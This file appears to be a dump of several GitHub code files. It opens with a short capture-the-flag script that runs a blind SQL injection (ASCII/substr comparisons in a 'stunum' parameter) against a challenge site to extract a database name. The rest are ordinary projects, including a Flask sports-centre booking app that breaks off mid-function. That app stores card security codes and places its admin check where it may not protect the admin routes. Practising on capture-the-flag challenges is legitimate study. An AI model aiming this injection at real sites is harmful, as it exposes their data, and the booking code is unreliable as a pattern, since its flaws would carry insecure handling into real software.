+{"seq_id":"75132183130","text":"import requests\n\nurl=\"http://ea48910f-376f-4f65-9b03-20a70766520e.node3.buuoj.cn/index.php\"\n# url=\"http://1a80bd91-ddfa-4db6-bd93-198413227815.node3.buuoj.cn/index.php?stunum=if(ascii(substr(database(),1,1))=55,1,2)\"\npayload=\"if(ascii(substr(database(),{},1))={},1,2)\"\n\n# if(ascii(substr(database(),1,1))=54,1,2)\n# if(ascii(substr(select database(),1,1))=55,1,2)\ncharacters=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_\"\nif __name__ == \"__main__\":\n result=\"\"\n for i in range(1,25):\n for ac in range(33,125):\n params={\n \"stunum\":payload.format(i,ac)\n }\n response=requests.get(url=url,params=params)\n # response=requests.get(url=url)\n # print(response.text)\n if(\"Hi admin\" in response.text):\n result+=chr(ac)\n # print(ac)\n print(result)","repo_name":"lurenxiao1998/CTFOJ","sub_path":"[WUSTCTF2020]颜值成绩查询/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"41883448548","text":"from flask import request, jsonify\nfrom chat.api import api_bp\nimport pickle\nimport re\n\n\nclass TextSpamClassifier():\n def __init__(self) -> None:\n with open('notebooks/spam_filter/model_spam.pickle', 'rb') as handle:\n self.model = pickle.load(handle)\n with open('notebooks/spam_filter/vectorizer_spam.pickle',\n 'rb') as handle:\n self.vectorizer = pickle.load(handle)\n\n def __preprocess_text(self, text):\n text = text.lower()\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text)\n text = text.strip()\n text = text.split()\n text = ' '.join(list(filter(lambda x: x not in ['', ' '], text)))\n return text\n\n def predict_proba(self, X):\n val = self.__preprocess_text(X)\n val = self.vectorizer.transform([val])\n prob = self.model.predict_proba(val)[0][1]\n return prob\n\n\nclass TextProfanityClassifier():\n def __init__(self) -> None:\n with open('notebooks/profanity_filter/model_profanity.pickle',\n 'rb') as handle:\n self.model = pickle.load(handle)\n with open('notebooks/profanity_filter/vectorizer_profanity.pickle',\n 'rb') as handle:\n self.vectorizer = pickle.load(handle)\n\n def __preprocess_text(self, text):\n text = text.lower()\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text)\n text = text.strip()\n text = text.split()\n text = ' '.join(list(filter(lambda x: x not in ['', ' '], text)))\n return text\n\n def predict_proba(self, X):\n val = self.__preprocess_text(X)\n val = self.vectorizer.transform([val])\n prob = self.model.predict(val)[0]\n return prob\n\n\n@api_bp.route('/text-validate', methods=['POST'])\ndef text_chat_validate():\n message = request.form.get('message')\n tsc = TextSpamClassifier()\n tpc = TextProfanityClassifier()\n spam_text = \"Not a spam!\"\n prof_text = \"No profane!\"\n if tpc.predict_proba(message) != 0:\n prof_text = \"Highly profane!\"\n if tsc.predict_proba(message) > 0.8:\n spam_text = \"Highly spam!\"\n elif tsc.predict_proba(message) > 0.6:\n spam_text = \"Slightly spam!\"\n elif tsc.predict_proba(message) > 0.4:\n spam_text = \"Less spam!\"\n elif tsc.predict_proba(message) > 0.2:\n spam_text = \"I don't think spam!\"\n\n prof_prob = tpc.predict_proba(message)\n if prof_prob > 0.5:\n prof_text = \"Profane text!\"\n\n return jsonify({\n \"spam_text\": f\"{spam_text}\",\n \"prof_text\": f\"{prof_text}\",\n \"status\": \"success\"\n })\n","repo_name":"indic-amigo-akademi/moraliser","sub_path":"chat/api/chat_route.py","file_name":"chat_route.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4269888887","text":"#!/usr/bin/python\nimport random\ntry:\n from cParameters import *\n from cReadInpLifespan import *\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) + \"\\\\.site_packages\\\\riverpy\\\\\")\n import fGlobal as fGl\n import config\n import cThresholdDirector as cT\n import cDefinitions\nexcept:\n print(\"ExceptionERROR: Cannot find package files (/.site_packages/riverpy/).\")\n\ntry:\n import arcpy\nexcept:\n print(\"ExceptionERROR: arcpy is not available (check license connection?)\")\ntry:\n from arcpy.sa import *\nexcept:\n print(\"ExceptionERROR: Spatial Analyst (arcpy.sa) is not available (check license?)\")\n\n\ndef create_bed_shear(self, condition1):\n self.features = cDefinitions.FeatureDefinitions()\n self.feature_reader = cDefinitions.FeatureReader()\n self.thresh_xlsx = config.xlsx_thresholds\n\n try:\n self.wb = oxl.load_workbook(filename=self.thresh_xlsx, read_only=True, data_only=True)\n wb_open = True\n except:\n wb_open = False\n self.logger.info(\"ERROR: Could not open threshold_values.xlsx.\")\n try:\n if wb_open:\n self.ws = self.wb['thresholds']\n else:\n self.ws = \"\"\n except:\n self.logger.info(\"ERROR: Could not find sheet \\'thresholds\\' in threshold_values.xlsx.\")\n\n self.thresh_row_dict = self.feature_reader.get_rows()\n unit_cell = self.ws.cell(row=self.thresh_row_dict['unit'], column=5).value\n\n print(unit_cell)\n __n__ = 0.0473934\n\n if unit_cell == \"U.S. customary\":\n self.ft2m = config.ft2m\n self.ft2in = 12 # (in/ft) conversion factor for U.S. customary units\n self.n = __n__ / 1.49 # (s/ft^(1/3)) global Manning's n where k =1.49 converts to US customary\n self.n_label = \"s/ft^(1/3)\"\n self.rho_w = 1.937 # slug/ft^3\n else:\n self.ft2m = 1.0\n self.ft2in = 1 # (in/ft) dummy conversion factor in SI\n self.n = __n__ # (s/m^(1/3)) global Manning's n\n self.n_label = \"s/m^(1/3)\"\n self.rho_w = 1000 # kg/m^3\n\n self.g = 9.81 / self.ft2m # (ft/s2) gravity acceleration\n self.s = 2.68 # (--) relative grain density (ratio of rho_s and rho_w)\n self.sf = 0.99\n dir_tb = config.dir2conditions + condition1 + \"\\\\tb\\\\\"\n dir_ts = config.dir2conditions + condition1 + \"\\\\ts\\\\\"\n\n os.mkdir(dir_ts)\n os.mkdir(dir_tb)\n\n h = FlowDepth(condition1)\n u = FlowVelocity(condition1)\n grains = GrainSizes(condition1)\n if str(grains.raster).__len__() > 1:\n tx_raster_list = []\n for i in range(0, h.raster_names.__len__()):\n if (str(u.rasters[i]).__len__() > 1) and (str(h.rasters[i]).__len__() > 1):\n _q_ = fGl.read_Q_str(h.raster_names[i], prefix='h')\n _name__ = 'tb' + fGl.write_Q_str(_q_) + '.tif'\n name__ = 'ts' + fGl.write_Q_str(_q_) + '.tif'\n _ras__ = Square(u.rasters[i] / (5.75 * Log10(12.2 * h.rasters[i] / (2 * 2.2 * grains.raster))))\n arcpy.CopyRaster_management(_ras__, dir_tb + _name__)\n __ras__ = (self.rho_w * _ras__) / (self.rho_w * self.g * (self.s - 1) * grains.raster)\n arcpy.CopyRaster_management(__ras__, dir_ts + name__)\n tx_raster_list.append(__ras__)\n\n","repo_name":"RiverArchitect/program","sub_path":"LifespanDesign/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"}
+{"seq_id":"7808298572","text":"import simPyon as sim\nimport numpy as np\n# To run this file must be in the same folder as \n\ndef main():\n\t# Load up some voltages\n\tvolts = np.load('volts_de_e_1_330_3.npy').item()\n\n\t# Load Simion command environment\n\timap = sim.simion()\n\n\t# mannually input voltages\n\timap.define_volts()\n\n\t# Fast Adjust voltages \n\timap.fast_adjust(elec_dict = volts) # if volts was loaded\n\timap.fast_adjust() #if voltages were input mannually\n\n\t# Define Line distributions for source\n\tline_1 = [np.array([260,156,0]),np.array([270,106,0])]\n\tline_2 = [np.array([99.4,133,0])+10,np.array([158.9,116.8,0])+10]\n\n\t# Print particle source description\n\tprint(imap.parts())\n\n\t# Change distribution type\n\t# imap.parts.pos = sim.particles.source('gaussian')\n\n\t# Change Distribution inputs\n\timap.parts.pos.dist_vals['first'] = line_1[0]\n\timap.parts.pos.dist_vals['last'] = line_1[1]\n\n\t# Fly Particles with souce line_1 and store in data_line_1\n\tdata_line_1 = imap.fly(10000).data\n\n\t# Chance source location to line_2 and fly\n\timap.parts.pos.dist_vals['first'] = line_2[0]\n\timap.parts.pos.dist_vals['last'] = line_2[1]\n\tdata_line_2 = imap.fly(10000).data\n\n\t# Show Simion Geometry and last flown particles\n\timap.show()\n\t# enable measurement mode\n\timap.show(measure = True)\n\n\t# Plot distributions of flow data\n\tdata_line_2.show()\n\tdata_line_1.show()\n\nif __name__ =='__main__':\n\tmain()","repo_name":"jonbowr/simPyon","sub_path":"examples/sim_init.py","file_name":"sim_init.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"}
+{"seq_id":"72118399451","text":"import datetime as dt\nfrom functools import reduce\n\nimport qrcode\nimport pdfkit\nfrom flask import render_template, redirect, url_for, flash, request\nfrom flask_login import login_required, current_user\n\nfrom . import main\nfrom .tables import ActivityTable, FacilityTable\nfrom .forms import *\nfrom ..models import *\nfrom .. import db\nfrom ..decorators import admin_required, permission_required\nfrom ..email import send_email\n\n\n@main.route('/')\ndef index():\n if current_user.is_administrator():\n return render_template('admin/index.html')\n return render_template('index.html')\n\n\n@main.route('/facility')\ndef facility():\n facilities = Facility.query.all()\n return render_template('facilities.html', facilities=facilities)\n\n\n@main.route('/facility_info/')\ndef view_info(id):\n facility = Facility.query.filter_by(id=id).first()\n return render_template('facility_info.html', facility=facility)\n\n\n@main.route('/membership')\ndef view_membership_type():\n memberships = MembershipType.query.all()\n return render_template('membership.html', memberships=memberships)\n\n\n@main.route('/my_bookings/')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_my_bookings(id):\n account = User.query.get_or_404(id)\n bookings = Booking.query.order_by(Booking.timestamp.desc()).filter_by(account_id=account.id).all()\n start_time = []\n end_time = []\n for booking in bookings:\n timetable = TimeManagement.query.filter_by(booking_id=booking.id).get()\n start_time.append(timetable.start_time)\n end_time.append(timetable.end_time)\n return render_template('my_booking.html', bookings=bookings)\n\n\n@main.route('/pricing_list')\ndef display_pricing_list():\n return render_template('pricing_list.html', facilities=Facility.query.all())\n\n\n@main.route('/activities//book', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_activity(id):\n form = BookActivityForm(activity=Activity.query.get(id))\n if form.validate_on_submit():\n return render_template('book_activity_instance.html', instance_id=form.activity_instance_id.data)\n return render_template('book_activity.html', form=form)\n\n\n@main.route('/activity-instances//book', methods=['GET', 'POST'])\ndef book_activity_instance(instance_id):\n form = SelectPaymentForm(cards=current_user.cards)\n instance = ActivityInstance.query.get_or_404(instance_id)\n if form.validate_on_submit():\n booking = Booking(activity_instance_id=instance_id,\n status='Paid',\n user_id=current_user.id)\n db.session.add(booking)\n db.session.commit()\n return render_template('booking_success.html', booking=booking)\n return render_template('book_activity_instance.html', form=form, instance=instance)\n\n\n@main.route('/book/', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_facility(type):\n if type == 1:\n facility = \"Swimming pool\"\n form = PoolBookingForm()\n elif type == 2:\n facility = \"Fitness room\"\n form = FitnessBookingForm()\n elif type == 3:\n facility = \"Squash courts\"\n form = SquashBookingForm()\n else:\n facility = \"Sports hall\"\n form = HallBookingForm()\n\n if form.validate_on_submit():\n activity = form.activity.data\n number = form.number.data\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n payment = form.payment.data\n\n fac = Facility.query.filter_by(name=facility).first()\n act = fac.activities.query.filter_by(activity_name=activity).first()\n price = act.activity_price\n\n if end_time - start_time != 1:\n flash('You can only book a 1-hour session')\n return redirect(url_for('.book_facility', type=type))\n\n timetables = TimeManagement.query.filter_by(date=date).all()\n for timetable in timetables:\n if start_time == timetable.start_time:\n id = timetable.id\n\n timetable = TimeManagement.query.filter_by(id=id).get()\n\n if number + timetable.current_capacity > fac.capacity:\n flash('Your have too many people!')\n return redirect(url_for('.book_facility', type=type))\n\n else:\n act.weekly_income = act.weekly_income + price\n act.weekly_usage = act.weekly_usage + number\n db.session.add(act)\n db.session.commit()\n\n booking = Booking(number=number,\n time_id=timetable.id,\n activity=activity,\n status=\"Unpaid\",\n payment=payment,\n fees=price)\n db.session.add(booking)\n db.session.commit()\n\n account = Account.query.filter_by(user_id=current_user.id).first()\n book = Booking.query.order_by(Booking.timestamp.desc()).filter_by(account_id=account.id).first_or_404()\n\n timetable.current_capacity = number + timetable.current_capacity\n db.session.add(timetable)\n db.session.commit()\n\n if payment == \"Credit Card\":\n flash('Pay for your booking.')\n return redirect(url_for('.handle_card_booking'), book_id=book.id)\n elif payment == \"Cash\":\n flash('You will pay for your booking by cash.')\n return redirect(url_for('.index'))\n\n return render_template('book.html', form=form)\n\n\n'''\n@main.route('/book_season', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_regular():\n form = RegularBookForm()\n if form.validate_on_submit():\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n'''\n\n\n@main.route('/handle_card_booking/', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.HANDLE)\ndef handle_card_booking(book_id):\n account = Account.query.filter_by(user_id=current_user.id).first()\n card = CreditCardInfo.query.filter_by(account_id=account.id).first()\n book = Booking.query.filter_by(id=book_id).first()\n form = CardForm()\n\n if form.validate_on_submit():\n card_info = CreditCardInfo(card_number=form.card_number.data,\n expire_month=form.expire_month.data,\n expire_year=form.expire_year.data,\n security_code=form.security_code.data,\n holder_name=form.holder_name.data,\n account_id=id\n )\n if card is not None:\n form.card_number.data = card.card_number\n form.expire_month.data = card.expire_month\n form.expire_year.data = card.expire_year\n form.security_code.data = card.security_code\n form.holder_name.data = card.holder_name\n db.session.add(card_info)\n db.session.commit()\n book.status = \"Paid\"\n db.session.add(book)\n db.session.commit()\n\n receipt = book.activity + '\\n' + book.time.date + '\\n' + book.time.start_time + '~' + book.time.end_time + '\\n'\n pdf_name = str(book.id) + '.pdf'\n pdfkit.from_string(receipt, pdf_name)\n\n qr = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=4,\n )\n\n qr.add_data(\n book.activity + '\\n' + book.time.date + '\\n' + book.time.start_time + '~' + book.time.end_time + '\\n')\n qr.make(fit=True)\n\n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\n\n send_email(current_user.email, 'Your booking receipt',\n 'booking_receipt', book=book, img=img)\n flash('A booking receipt has been sent to you by email.')\n return render_template('handle_card_booking.html', book=book, form=form)\n\n\n@main.route('/bookings//cancel', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CANCEL)\ndef cancel_booking(id):\n booking = Booking.query.get_or_404(id)\n form = SelectPaymentForm(cards=current_user.cards)\n if form.validate_on_submit():\n db.session.delete(booking)\n db.session.commit()\n return redirect(url_for('.display_user_bookings'))\n return render_template('cancel_booking.html', form=form, booking=booking)\n\n\n@main.route('/pay_membership/', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef pay_membership(type_id):\n membership_type = MembershipType.query.query.filter_by(id=type_id).get()\n account = Account.query.filter_by(user_id=current_user.id).first()\n form = PurchaseMembershipForm()\n if form.validate_on_submit():\n membership = Membership(title=form.title.data,\n status=\"Unpaid\",\n firstname=form.firstname.data,\n lastname=form.lastname.data,\n payment=form.payment.data,\n account_id=account.id,\n membership_type_id=membership_type.id\n )\n db.session.add(membership)\n db.session.commit()\n\n if (membership_type.length == 3):\n length = 30\n elif (membership_type.length == 3):\n length = 90\n else:\n length = 365\n membership.valueOfEnd_date(length)\n db.session.commit()\n\n flash('Thanks! You have become our membership!')\n return redirect(url_for('handle_card_membership', id=account.id))\n return render_template('pay_membership.html', form=form, membership_type=membership_type)\n\n\n@main.route('/handle_card_membership/', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.HANDLE)\ndef handle_card_membership(id):\n membership = Membership.query.filter_by(account_id=id).first()\n card = CreditCardInfo.query.filter_by(account_id=id).first()\n form = CardForm()\n membership_type = MembershipType.query.filter_by(id=membership.membership_type_id).first()\n price = membership_type.id\n if form.validate_on_submit():\n card_info = CreditCardInfo(card_number=form.card_number.data,\n expire_month=form.expire_month.data,\n expire_year=form.expire_year.data,\n security_code=form.security_code.data,\n holder_name=form.holder_name.data,\n account_id=id\n )\n if card is not None:\n form.card_number.data = card.card_number\n form.expire_month.data = card.expire_month\n form.expire_year.data = card.expire_year\n form.security_code.data = card.security_code\n form.holder_name.data = card.holder_name\n db.session.add(card_info)\n db.session.commit()\n membership.status = \"Paid\"\n db.session.add(membership)\n db.session.commit()\n send_email(current_user.email, 'Your booking receipt',\n 'booking_receipt', membership=membership)\n flash('A booking receipt has been sent to you by email.')\n return render_template('handle_card_membership.html', price=price, form=form)\n\n\n@main.route('/configure_facility', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_facility():\n form = ConfigureFacilityForm()\n if form.validate_on_submit():\n operation = form.operation.data\n capacity = form.capacity.data\n name = form.name.data\n url = form.url.data\n description = form.description.data\n\n if operation == \"add\":\n facility = Facility(name=name,\n url=url,\n capacity=capacity,\n description=description)\n db.session.add(facility)\n db.session.commit()\n flash('You have added the facility')\n\n elif operation == \"edit\":\n fac = Facility.query.filter_by(name=name).get()\n fac.capacity = capacity\n fac.url = url\n fac.description = description\n\n db.session.add(fac)\n db.session.commit()\n flash('You have edited the facility')\n\n elif operation == \"delete\":\n fac = Facility.query.filter_by(name=name).get()\n db.session.delete(fac)\n db.session.commit()\n flash('You have deleted the facility')\n\n return render_template('configure_facility.html', form=form)\n\n\n@main.route('/configure_activity', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_activity():\n form = ConfigureActivityForm()\n if form.validate_on_submit():\n operation = form.operation.data\n facility = form.facility.data\n activity = form.activity.data\n price = form.price.data\n\n fac = Facility.query.filter_by(name=facility).get\n if operation == \"add\":\n act = Activity(weekly_income=0,\n weekly_usage=0,\n activity_price=price,\n activity_name=activity,\n facility_id=fac.id\n )\n db.session.add(act)\n db.session.commit()\n flash('You have added the activity')\n\n elif operation == \"edit\":\n act = Activity.query.filter_by(activity_name=activity).get()\n act.activity_price = price,\n act.activity_name = activity\n act.facility_id = fac.id\n\n db.session.add(act)\n db.session.commit()\n flash('You have edited the activity')\n\n elif operation == \"delete\":\n act = Activity.query.filter_by(activity_name=activity).get()\n db.session.delete(act)\n db.session.commit()\n flash('You have deleted the activity')\n\n return render_template('configure_activity.html', form=form)\n\n\n@main.route('/configure_timetable')\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_timetable():\n form = ConfigureTimetableForm()\n if form.validate_on_submit():\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n facility = form.facility.data\n\n fac = Facility.query.filter_by(name=facility).get()\n\n for i in range(start_time, end_time):\n timetable = TimeManagement(date=date,\n start_time=i,\n end_time=i + 1,\n facility_id=fac.id)\n db.session.add(timetable)\n db.session.commit()\n\n return render_template('configure_timetable.html', form=form)\n\n\n@main.route('/facilities')\ndef display_facilities():\n facilities = Facility.query.all()\n template = 'admin/facilities.html' if current_user.is_administrator() else 'facilities.html'\n return render_template(template, facilities=facilities)\n\n\n@main.route('/membership-types')\ndef display_membership_types():\n memberships = MembershipType.query.all()\n template = 'admin/membership_types.html' if current_user.is_administrator() else 'membership.html'\n return render_template(template, membership_types=memberships)\n\n\n@main.route('/membership-types//purchase', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef purchase_membership(type):\n membership_type = MembershipType.query.get_or_404(type)\n form = SelectPaymentForm(cards=current_user.cards)\n\n if form.validate_on_submit():\n membership = Membership(membership_type_id=type, user_id=current_user.id)\n db.session.add(membership)\n\n if form.payment_card.data == SelectPaymentForm.NEW_CARD_CHOICE[0]:\n card_form = form.new_payment_card\n new_card = CreditCardInfo(\n holder_name=card_form.cardholder_name.data,\n card_number=card_form.card_number.data,\n expire_month=card_form.expiry_date.expiry_month.data,\n expire_year=card_form.expiry_date.expiry_year.data,\n security_code=card_form.security_code.data,\n user_id=current_user.id\n )\n db.session.add(new_card)\n flash('Card successfully added to your account.')\n\n db.session.commit()\n flash('Thanks! You have successfully purchased a {} membership.'.format(membership_type.name))\n return redirect(url_for('main.index'))\n\n return render_template('pay_membership.html', membership_type=membership_type, form=form)\n\n\n@main.route('/my/bookings')\n@login_required\ndef display_user_bookings():\n return render_template('my_booking.html', bookings=current_user.bookings)\n\n\n@main.route('/my_card/')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_cards(id):\n user = User.query.filter_by(id=id).first()\n cards = CreditCardInfo.query.filter_by(user_id=user.id).all()\n return render_template('my_card.html', cards=cards)\n\n\n@main.route('/my/membership')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_membership():\n membership = Membership.query.filter_by(user_id=current_user.id).first()\n membership_type = MembershipType.query.filter_by(id=membership.membership_type_id).first() if membership else None\n return render_template('my_membership.html', membership=membership, membership_type=membership_type)\n\n\n@main.route('/timetable')\ndef timetable_all():\n date = request.args.get('date', default=datetime.today(), type=dt.datetime)\n end_of_day = datetime(\n year=date.year,\n month=date.month,\n day=date.day + 1,\n hour=0,\n minute=0,\n second=0\n )\n activity_instances = ActivityInstance.query \\\n .filter(ActivityInstance.start_time >= date, ActivityInstance.end_time < end_of_day) \\\n .order_by(ActivityInstance.start_time) \\\n .all()\n\n activity_instances_by_facility = {facility.name: [] for facility in Facility.query.all()}\n for instance in activity_instances:\n activity_instances_by_facility[instance.activity.facility.name].append(instance)\n\n return render_template('timetable_all.html', activity_instances=activity_instances_by_facility)\n\n\n@main.route('/facilities//timetable')\ndef timetable_facility(id):\n facility = Facility.query.get_or_404(id)\n activity_instances = reduce(list.__add__, [activity.instances.order_by(ActivityInstance.start_time).all() for activity in facility.activities.all()])\n return render_template('timetable_all.html', activity_instances={facility.name: activity_instances})\n\n\n# @main.route('/timetable_facility/')\n# def timetable_facility(type):\n# if type == 1:\n# facility = \"Swimming pool\"\n# elif type == 2:\n# facility = \"Fitness room\"\n# elif type == 3:\n# facility = \"Squash courts\"\n# else:\n# facility = \"Sports hall\"\n#\n# facility = Facility.query.filter_by(name=facility).all()\n# today = dt.date.today()\n# day2 = today + dt.timedelta(days=1)\n# day3 = today + dt.timedelta(days=2)\n# day4 = today + dt.timedelta(days=3)\n# day5 = today + dt.timedelta(days=4)\n# timetable1 = TimeManagement.query.filter_by(start_time=today).all()\n# timetable2 = TimeManagement.query.filter_by(start_time=day2).all()\n# timetable3 = TimeManagement.query.filter_by(start_time=day3).all()\n# timetable4 = TimeManagement.query.filter_by(start_time=day4).all()\n# timetable5 = TimeManagement.query.filter_by(start_time=day5).all()\n# return render_template('timetable_facility.html', type=type + 1, today=today, day3=day3, day2=day2, day4=day4,\n# day5=day5, facility=facility, timetable1=timetable1, timetable2=timetable2,\n# timetable3=timetable3, timetable4=timetable4, timetable5=timetable5)\n\n\n@main.route('/my/membership/cancel', methods=['GET', 'POST'])\n@login_required\ndef cancel_membership():\n membership = current_user.membership\n if membership is None:\n return redirect(url_for('main.display_membership'))\n timedelta = membership.get_end_date() - dt.datetime.now()\n days_left = timedelta.days\n money_refund = 0.9 * (days_left / membership.membership_type.length) * membership.membership_type.price\n form = SelectPaymentForm(cards=current_user.cards)\n if form.validate_on_submit():\n db.session.delete(membership)\n db.session.commit()\n flash('You have cancelled our membership!')\n return redirect(url_for('main.display_membership'))\n return render_template('cancel_membership.html', money_refund=money_refund, days_left=days_left,\n membership=membership, form=form)\n\n\n@main.route('/user/')\ndef user(username):\n user = User.query.filter_by(username=username).first_or_404()\n return render_template('user.html', user=user)\n\n\n@main.route('/search_booking')\n@login_required\n@permission_required(Permission.CANCEL)\ndef search_booking():\n form = SearchForm()\n if form.validate_on_submit():\n email = form.eamil.data\n\n user = User.query.filter_by(email=email).get()\n return redirect(url_for('display_bookings', id=user.id))\n return render_template('search_booking.html', form=form)\n\n\n@main.route('/search_membership')\n@login_required\n@permission_required(Permission.CANCEL)\ndef search_membership():\n form = SearchForm()\n if form.validate_on_submit():\n email = form.eamil.data\n\n user = User.query.filter_by(email=email).get()\n return redirect(url_for('display_membership', id=user.id))\n return render_template('search_membership.html', form=form)\n\n\n@main.route('/view_income')\n@login_required\n@permission_required(Permission.VIEW_BUSINESS)\ndef view_income():\n \"\"\"income_facility1 = 0\n income_facility2 = 0\n income_facility3 = 0\n income_facility4 = 0\n\n today = datetime.date.today()\n day1 = today - datetime.timedelta(days=1)\n day2 = today - datetime.timedelta(days=2)\n day3 = today - datetime.timedelta(days=3)\n day4 = today - datetime.timedelta(days=4)\n day5 = today - datetime.timedelta(days=5)\n day6 = today - datetime.timedelta(days=6)\n\n timetable1 = Time_management.query.filter_by(date=today).all()\n timetable2 = Time_management.query.filter_by(date=day1).all()\n timetable3 = Time_management.query.filter_by(date=day2).all()\n timetable4 = Time_management.query.filter_by(date=day3).all()\n timetable5 = Time_management.query.filter_by(date=day4).all()\n timetable6 = Time_management.query.filter_by(date=day5).all()\n timetable7 = Time_management.query.filter_by(date=day6).all()\n\n for timetable in timetable1:\n if timetable.facility == 1:\n booking = Booking.query.filter_by(id=timetable.booking_id).get()\n income_facility1 += booking.fees\n\"\"\"\n overall_income = 0\n overall_usage = 0\n activities = Activity.query.all()\n for activity in activities:\n overall_income += activity.weekly_income\n overall_usage += activity.weekly_usage\n return render_template('business.html', overall_income=overall_income,\n overall_usage=overall_usage, activities=activities)\n\n\n@admin_required\n@main.route('/users')\ndef display_users():\n return render_template('admin/users.html', users=User.query.all())\n\n\n@admin_required\n@main.route('/users/new', methods=['GET', 'POST'])\ndef add_user():\n form = EditUserForm()\n if form.validate_on_submit():\n user = User(email=form.email.data.lower(),\n username=form.username.data,\n password=form.password.data,\n role_id=form.role.data.id)\n db.session.add(user)\n db.session.commit()\n flash('User successfully added to database.')\n return redirect(url_for('.display_users'))\n return render_template('admin/edit_user.html', form=form)\n\n\n@admin_required\n@main.route('/activity-instances')\ndef display_activity_instances():\n return render_template('admin/activity_instances.html', activity_instances=ActivityInstance.query.all())\n\n\n@admin_required\n@main.route('/activity-instances/new', methods=['GET', 'POST'])\ndef add_activity_instance():\n form = EditActivityInstanceForm()\n if form.validate_on_submit():\n instance = ActivityInstance(\n start_time=form.start_time.data,\n end_time=form.end_time.data,\n activity_id=form.activity_id.data,\n court_id=form.court_id.data\n )\n db.session.add(instance)\n db.session.commit()\n flash('Activity instance successfully added to database.')\n return redirect(url_for('.display_activity_instances'))\n return render_template('admin/edit_activity_instance.html', form=form)\n\n\n@admin_required\n@main.route('/memberships')\ndef display_memberships():\n return render_template('admin/memberships.html', memberships=Membership.query.all())\n\n\n@admin_required\n@main.route('/memberships/new', methods=['GET', 'POST'])\ndef add_membership():\n form = EditMembershipForm()\n if form.validate_on_submit():\n membership = Membership(\n membership_type_id=form.membership_type_id.data,\n user_id=form.user_id.data\n )\n db.session.add(membership)\n db.session.commit()\n flash('Membership successfully added to database.')\n return redirect(url_for('.display_memberships'))\n return render_template('admin/edit_membership.html', form=form)\n\n\n@admin_required\n@main.route('/activities')\ndef display_activities():\n return render_template('admin/activities.html', activities=Activity.query.all())\n\n\n@admin_required\n@main.route('/bookings')\ndef display_bookings():\n return render_template('admin/bookings.html', bookings=Booking.query.all())\n\n\n@main.route('/edit-profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.name = form.name.data\n current_user.location = form.location.data\n current_user.about_me = form.about_me.data\n db.session.add(current_user._get_current_object())\n db.session.commit()\n flash('Your profile has been updated.')\n return redirect(url_for('.user', username=current_user.username))\n form.name.data = current_user.name\n form.location.data = current_user.location\n form.about_me.data = current_user.about_me\n return render_template('edit_profile.html', form=form)\n\n\n@main.route('/edit-profile/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_profile_admin(id):\n user = User.query.get_or_404(id)\n form = EditProfileAdminForm(user=user)\n if form.validate_on_submit():\n user.email = form.email.data\n user.username = form.username.data\n user.confirmed = form.confirmed.data\n user.role = Role.query.get(form.role.data)\n user.name = form.name.data\n user.location = form.location.data\n user.about_me = form.about_me.data\n db.session.add(user)\n db.session.commit()\n flash('The profile has been updated.')\n return redirect(url_for('.user', username=user.username))\n form.email.data = user.email\n form.username.data = user.username\n form.confirmed.data = user.confirmed\n form.role.data = user.role_id\n form.name.data = user.name\n form.location.data = user.location\n form.about_me.data = user.about_me\n return render_template('edit_profile.html', form=form, user=user)\n\n\n@main.route('/facilities/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_facility():\n form = EditFacilityForm()\n if form.validate_on_submit():\n facility = Facility(name=form.name.data,\n capacity=form.capacity.data,\n description=form.description.data)\n db.session.add(facility)\n db.session.commit()\n flash('Facility has been added to Database')\n return redirect(url_for('.display_facilities'))\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n@main.route('/activities/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_activity():\n form = EditActivityForm()\n if form.validate_on_submit():\n activity = Activity(activity_staff_id=form.activity_staff_id.data,\n activity_price=form.activity_price.data,\n activity_name=form.activity_name.data,\n facility_id=form.facility_id.data)\n db.session.add(activity)\n db.session.commit()\n flash('Facility has been added to Database')\n return redirect(url_for('.display_activities'))\n\n return render_template('admin/edit_activity.html', form=form)\n\n\n@main.route('/membership-types/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_membership_type():\n form = EditMembershipTypeForm()\n if form.validate_on_submit():\n membership_type = MembershipType(name=form.name.data, length=form.length.data, price=form.price.data)\n db.session.add(membership_type)\n db.session.commit()\n flash('Membership type has been added to database')\n return 